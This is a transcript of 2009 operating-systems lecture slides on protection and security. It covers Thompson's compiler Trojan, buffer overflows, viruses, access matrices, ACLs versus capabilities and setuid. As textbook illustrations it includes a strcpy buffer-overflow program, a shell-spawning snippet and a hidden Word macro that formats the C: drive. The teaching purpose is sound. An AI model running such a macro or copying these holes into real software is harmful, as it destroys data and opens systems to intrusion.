Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security...
-
date post
20-Dec-2015 -
Category
Documents
-
view
225 -
download
0
Transcript of Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security...
![Page 1: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/1.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 1
Introduction toProtection and Security
CS-3013, Operating SystemsA-term 2009
(Slides include materials from Modern Operating Systems, 3rd ed., by Andrew Tanenbaum and from Operating System Concepts, 7th ed., by Silbershatz, Galvin, & Gagne)
![Page 2: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/2.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 2
Concepts
• Protection:• Mechanisms and policy to keep programs and users
from accessing or changing stuff they should not do
• Internal to OS
• §9.1-9.3 in Tanenbaum
• Security:• Issues external to OS
• Authentication of user, validation of messages, malicious or accidental introduction of flaws, etc.
• §9.4-9.8 in Tanenbaum
![Page 3: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/3.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 3
Outline
• The first computer virus
• Some program threats
• Overview of protection mechanisms
![Page 4: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/4.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 4
The First Computer Virus
• Reading assignment:–Ken Thompson, “Reflections on Trusting Trust,”
Communications of ACM, vol.27, #8, August 1984, pp. 761-763 (pdf)
• Three steps1. Program that prints a copy of itself
2. Training a compiler to understand a constant
3. Embedding a Trojan Horse without a trace
Require
d read
ing
![Page 5: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/5.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 5
Step 1 – Program to print copy of itself
• How do we do this?
• First, store character array representing text of program
• Body of program• Print declaration of character array
• Loop through array, printing each character
• Print entry array as a string
• Result: general method for program to reproduce itself to any destination!
![Page 6: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/6.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 6
Step 2 – Teaching constant values to compiler
…
/* reading string constants */
if (s[i++] == '\\')
if (s[i] == 'n') insert ('\n');
elseif (s[i] == 'v') insert ('\v');
elseif …
• Question: How does compiler know what integer values to insert for '\n', '\v', etc.?
![Page 7: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/7.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 7
Step 2 (continued)
• Answer: In the first compiler for this machine type, insert the actual character code
• i.e., 11 (decimal) for ‘\v’, etc.
/* reading string constants */
if (s[i++] == '\\')
if (s[i] == 'n') insert ('\n');
elseif (s[i] == 'v') insert (11);
elseif …
• Next: Use the first compiler to compile itself!
![Page 8: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/8.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 8
Step 2 (continued)
• Result: a compiler that “knows” how to interpret the sequence “\v”
• And all compilers derived from this one, forever after!
• Finally: replace the value “11” in the source code of the compiler with ‘\v’ and compile itself again
• Note: no trace of values of special characters in …– The C Programming Language book– source code of C compiler
• I.e., special character values are self-reproducing
![Page 9: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/9.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 9
Step 3 – Inserting a Trojan Horse
• In compiler source, add the textif (match(sourceString, pattern)insert the Trojan Horse code
where “pattern” is the login code (for example)
• In compiler source, add additional textif (match(sourceString2, pattern2)insert the self-reproducing code
where “pattern2” is a part of the compiler itself
• Use this compiler to recompile itself, then remove source
![Page 10: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/10.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 10
Step 3 – Concluded
• Result: an infected compiler that willa. Insert a Trojan Horse in the login code of any Unix
system
b. Propagate itself to all future compilers
c. Leave no trace of Trojan Horse in its source code
• Like a biological virus: – A small bundle of code that uses the compiler’s own
reproductive mechanism to propagate itself
![Page 11: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/11.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 11
Questions?
![Page 12: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/12.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 12
Program Threats
• Trojan Horse– Code segment that misuses its environment– Exploits mechanisms for allowing programs written by users to be
executed by other users– Spyware, pop-up browser windows, covert channels
• Trap Door– Specific user identifier or password that circumvents normal
security procedures– Could be included in a compiler
• Logic Bomb– Program that initiates a security incident under certain
circumstances• Stack and Buffer Overflow
– Exploits a bug in a program (overflow either the stack or memory buffers)
![Page 13: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/13.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 13
C Program with Buffer-overflow Condition
#include <stdio.h>#define BUFFER SIZE 256int main(int argc, char *argv[]){char buffer[BUFFER SIZE];if (argc < 2)
return -1;else {
strcpy(buffer,argv[1]);return 0;
}}
![Page 14: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/14.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 14
Layout of Typical Stack Frame
![Page 15: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/15.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 15
Modified Shell Code
#include <stdio.h>
int main(int argc, char *argv[])
{
execvp('\bin\sh', '\bin \sh', NULL);
return 0;
}
![Page 16: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/16.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 16
Hypothetical Stack Frame
Before attack After attack
![Page 17: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/17.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 17
Effect
• If you can con a privileged program into reading a string into a buffer unprotected from overflow, then …
• …you have just gained the privileges of that program in a shell!
![Page 18: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/18.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 18
Program Threats – Viruses
• Code fragment embedded in legitimate programs• Very specific to CPU architecture, operating
system, applications• Usually borne via email or as a macro• E.g., Visual Basic Macro to reformat hard drive
Sub AutoOpen()Dim oFSSet oFS = CreateObject(’’Scripting.FileSystemObject’’)vs = Shell(’’c:command.com /k format c:’’,vbHide)
End Sub
![Page 19: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/19.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 19
Program Threats (Cont.)
• Virus dropper inserts virus onto the system• Many categories of viruses, literally many thousands of
viruses– File– Boot– Macro– Polymorphic– Source code– Encrypted– Stealth– Tunneling– Multipartite– Armored
![Page 20: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/20.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 20
Questions?
![Page 21: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/21.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 21
Goals of Protection
• Operating system consists of a collection of objects (hardware or software)
• Each object has a unique name and can be accessed through a well-defined set of operations.
• Protection problem – to ensure that each object is accessed correctly and only by those processes that are allowed to do so.
![Page 22: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/22.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 22
Guiding Principles of Protection
• Principle of least privilege– Programs, users and systems should be given
just enough privileges to perform their tasks
• Separate policy from mechanism– Mechanism: the stuff built into the OS to make
protection work– Policy: the data that says who can do what to
whom
![Page 23: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/23.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 23
Domain Structure
• Access-right = <object-name, rights-set>where rights-set is a subset of all valid operations that can be performed on the object.
• Domain = set of access-rights
![Page 24: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/24.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 24
Conceptual Representation – Access Matrix
• View protection as a matrix (access matrix)
• Rows represent domains
• Columns represent objects
• Access(i, j) is set of operations that process executing in Domaini can invoke on Objectj
![Page 25: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/25.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 25
Textbook Access Matrix
• Columns are access control lists (ACLs)• Associated with each object
• Rows are capabilities• Associated with each user, group, or domain
![Page 26: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/26.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 26
Unix & Linux
• System comprises many domains:–– Each user– Each group– Kernel/System
• (Windows has even more domains than this!)
![Page 27: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/27.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 27
Unix/Linux Matrix
file1 file 2 file 3 device domain
User/Domain 1 r rx rwx – enter
User/Domain 2 r x rx rwx –
User/Domain 3 rw – – – –
…
• Columns are access control lists (ACLs)• Associated with each object
• Rows are capabilities• Associated with each user or each domain
![Page 28: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/28.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 28
Changing Domains (Unix)
• Domain = uid or gid• Domain switch via file access controls
– Each file has associated with it a domain bit (setuid bit).• rwS instead of rwx
– When executed with setuid = on, then uid or gid is temporarily set to owner or group of file.
– When execution completes uid or gid is reset.
• Separate mechanism for entering kernel domain– System call interface
![Page 29: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/29.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 29
General (textbook) representation
• Domains as objects added to Access Matrix
![Page 30: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/30.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 30
Practicalities
• At run-time…– What does the OS know about the user?
– What does the OS know about the resources?
• What is the cost of checking and enforcing?– Access to the data
– Cost of searching for a match
• Impractical to implement full Access Matrix– Size
– Access controls disjoint from both objects and domains
![Page 31: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/31.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 31
ACLs vs. Capabilities
• Access Control List: Focus on resources– Good if resources greatly outnumber users– Can be implemented with minimal caching– Can be attached to objects (e.g., file metadata)
– Good when the user who creates a resource has authority over it
• Capability System: Focus on users– Good if users greatly outnumber resources– Lots of information caching is needed– Good when a system manager has control over all
resources
![Page 32: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/32.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 32
Both are needed
• ACLs for files and other proliferating resources• Capabilities for major system functions
• The common OSs offer BOTH– Linux emphasizes an ACL model
• provides good control over files and resources that are file-like
– Windows 2000/XP emphasize Capabilities• provides good control over access to system functions (e.g.
creating a new user, or doing a system backup…)
• Access control lists for files
![Page 33: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/33.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 33
…and good management, too!
• What do we need to know to set up a new user or to change their rights?
• …to set up a new resource or to change the rights of its users?
• …Who has the right to set/change access rights?
• No OS allows you to implement all the possible policies easily.
![Page 34: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/34.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 34
Enforcing Access Control
• User level privileges must always be less than OS privileges!– For example, a user should not be allowed to grab
exclusive control of a critical device– or write to OS memory space
• …and the user cannot be allowed to raise his privilege level!
• The OS must enforce it…and the user must not be able to bypass the controls
• In most modern operating systems, the code which manages the resource enforces the policy
![Page 35: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/35.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 35
(Traditional) Requirements–System Call Code
• No user can interrupt it while it is running
• No user can feed it data to make it – violate access control policies– stop serving other users
• No user can replace or alter any system call code
• No user can add functionality to the OS!
• Data must NEVER be treated as code!
![Page 36: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/36.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 36
“Yeah, but …”
• No user can interrupt it while it is running• Windows, Linux routinely interrupt system calls
• No user can feed it data to make it • violate access control policies• stop serving other users
• No user can replace or alter any system call code• Except your average virus
• No user can add functionality to the OS!• Except dynamically loaded device drivers
• Data must NEVER be treated as code!• “One man’s code is another man’s data” A. Perlis
![Page 37: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/37.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 37
Saltzer-Schroeder Guidelines
• System design should be public• Default should be no access• Check current authority – no caching!• Protection mechanism should be
– Simple, uniform, built into lowest layers of system
• Least privilege possible for processes• Psychologically acceptable
• KISS!
![Page 38: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/38.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 38
Reading Assignment
Tanenbaum, Chapter 9
![Page 39: Introduction to Protection and Security CS-3013 A-term 20091 Introduction to Protection and Security CS-3013, Operating Systems A-term 2009 (Slides include.](https://reader035.fdocuments.us/reader035/viewer/2022062313/56649d455503460f94a21dfe/html5/thumbnails/39.jpg)
Introduction to Protection and Security
CS-3013 A-term 2009 39
Questions?